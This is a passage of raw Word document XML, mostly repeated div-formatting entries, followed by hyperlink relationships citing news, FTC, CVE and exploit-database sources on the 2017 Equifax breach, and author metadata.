                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="44912243">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="954679007">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="177278990">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2103911687">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="412046750">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="514729047">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="762993365">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="973098464">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="651056829">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="841629401">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="908853469">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="357393319">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="631327325">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1613047426">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1477185671">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="635455220">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="205921330">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="916668696">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1078593715">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1484546750">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="780226596">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="176386329">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2060786807">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="383018410">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="1338773312">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="223105611">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="353925879">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="71971460">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="170873849">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="2290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astcompany.com/40464730/equifax-has-a-super-shady-history-that-might-explain-its-shady-present" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cnbc.com/2017/09/07/credit-reporting-firm-equifax-says-cybersecurity-incident-could-potentially-affect-143-million-us-consumer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xploit-db.com/exploits/41570/" TargetMode="Externa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hyperlink" Target="https://www.consumer.ftc.gov/blog/2017/09/equifax-data-breach-what-do"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equifax.com/business/all-products/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.youtube.com/watch?v=4pgg2LCY8i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pajournal.com/2017/12/15/equifax-data-breach/" TargetMode="External"/><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s://www.youtube.com/watch?v=bh1gzJFVFL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Equifax" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2017-5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A5927-F244-43EF-8A06-B8561039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Gould</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Joshua Gould</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-10-22T12:32:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-10-30T00:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>